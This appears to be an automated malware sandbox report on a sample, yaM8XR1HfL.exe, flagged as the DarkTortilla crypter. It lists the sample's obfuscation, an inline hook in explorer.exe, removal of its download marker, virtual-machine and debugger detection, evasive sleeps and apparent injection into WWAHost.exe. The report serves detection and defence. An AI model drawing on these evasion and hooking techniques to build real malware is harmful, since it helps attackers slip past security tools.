Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: yaM8XR1HfL.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: yaM8XR1HfL.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WWAHost.pdb source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: WWAHost.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2550784274.0000000003090000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3292650503.0000000000120000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: yaM8XR1HfL.exe, yaM8XR1HfL.exe, 00000004.00000002.2549746722.0000000001450000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, WWAHost.exe, 00000009.00000003.2551493393.0000000003EAA000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000003.2549750723.0000000003CF7000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.00000000041EE000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000009.00000002.3295685755.0000000004050000.00000040.00001000.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected DarkTortilla Crypter
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.3a926c0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.3a926c0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.53f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.yaM8XR1HfL.exe.53f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2494695632.0000000002851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
.NET source code contains method to dynamically call methods (often used by packers)
Source: yaM8XR1HfL.exe, w4M6D.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "invoke", new object[2]{null,new object[0]}, (string[])null, (Type[])null, (bool[])null, true)
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress, 9_2_0014AA8C
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_05C313BF push cs; ret 0_2_05C313CE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07210EC5 push FFFFFFE9h; ret 0_2_07210EC7
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07210DC6 push FFFFFFE9h; retn 0001h 0_2_07210DC8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07219191 pushad ; ret 0_2_072191A3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_075659EB push FFFFFFC3h; ret 0_2_07565A25
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 0_2_07CDF508 push 00000059h; ret 0_2_07CDF516
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145225F pushad ; ret 4_2_014527F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014527FA pushad ; ret 4_2_014527F9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014809AD push ecx; mov dword ptr [esp], ecx 4_2_014809B6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145283D push eax; iretd 4_2_01452858
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0145135E push eax; iretd 4_2_01451369
Source: C:\Windows\explorer.exe Code function: 7_2_0925BB02 push esp; retn 0000h 7_2_0925BB03
Source: C:\Windows\explorer.exe Code function: 7_2_0925BB1E push esp; retn 0000h 7_2_0925BB1F
Source: C:\Windows\explorer.exe Code function: 7_2_0925B9B5 push esp; retn 0000h 7_2_0925BAE7
Source: C:\Windows\explorer.exe Code function: 7_2_106E49B5 push esp; retn 0000h 7_2_106E4AE7
Source: C:\Windows\explorer.exe Code function: 7_2_106E4B02 push esp; retn 0000h 7_2_106E4B03
Source: C:\Windows\explorer.exe Code function: 7_2_106E4B1E push esp; retn 0000h 7_2_106E4B1F
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00126F7C push eax; retf 9_2_00126F85
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127036 push eax; retf 9_2_00127EF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127026 pushad ; iretd 9_2_00127029
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00173168 push ecx; ret 9_2_0017317B
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00129431 push ds; iretd 9_2_00129432
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00129537 push esi; retf 9_2_0012954C
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0012959A push CFE2086Ah; ret 9_2_001295AB
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_001296FD push ds; iretd 9_2_001296FE
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00127CEA push eax; retf 9_2_00127EF1
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040527FA pushad ; ret 9_2_040527F9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0405225F pushad ; ret 9_2_040527F9
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0405283D push eax; iretd 9_2_04052858
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_040809AD push ecx; mov dword ptr [esp], ecx 9_2_040809B6
Source: yaM8XR1HfL.exe Static PE information: section name: .text entropy: 7.1884613511282724

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe File opened: C:\Users\user\Desktop\yaM8XR1HfL.exe\:Zone.Identifier read attributes | delete Jump to behavior
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE1
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: yaM8XR1HfL.exe PID: 5160, type: MEMORYSTR
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88F0774
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88ED8A4
Source: C:\Windows\SysWOW64\WWAHost.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 2F79904 second address: 2F7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe RDTSC instruction interceptor: First address: 2F79B7E second address: 2F79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: E50000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 2850000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 4850000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 7CE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 8CE0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 8EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: 9EB0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: A240000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: B240000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Memory allocated: C240000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E rdtsc 4_2_014C096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 809 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 791 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Window / User API: threadDelayed 9730 Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Windows\explorer.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe API coverage: 0.9 %
Source: C:\Windows\SysWOW64\WWAHost.exe API coverage: 0.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 348 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 6648 Thread sleep time: -63000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe TID: 2764 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 4788 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 240 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -480000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep count: 9730 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe TID: 6572 Thread sleep time: -19460000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0016B120 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [esi+000000a4h], 03h and CTI: je 00191D18h 9_2_0016B120
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00149760 GetSystemTimeAsFileTime followed by cmp: cmp al, 01h and CTI: jne 00149886h 9_2_00149760
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0017212C memset,FindFirstFileW,FindClose, 9_2_0017212C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000007.00000002.3302042587.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTcaVMWare
Source: yaM8XR1HfL.exe, 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxTray
Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: yaM8XR1HfL.exe, 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: explorer.exe, 00000007.00000000.2499817163.00000000076F8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.3302042587.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2502264257.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: explorer.exe, 00000007.00000003.2651889553.0000000003554000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware,p
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000007.00000000.2502264257.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
Source: explorer.exe, 00000007.00000002.3292908189.0000000000F13000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.3302042587.0000000009B41000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.2499817163.000000000769A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
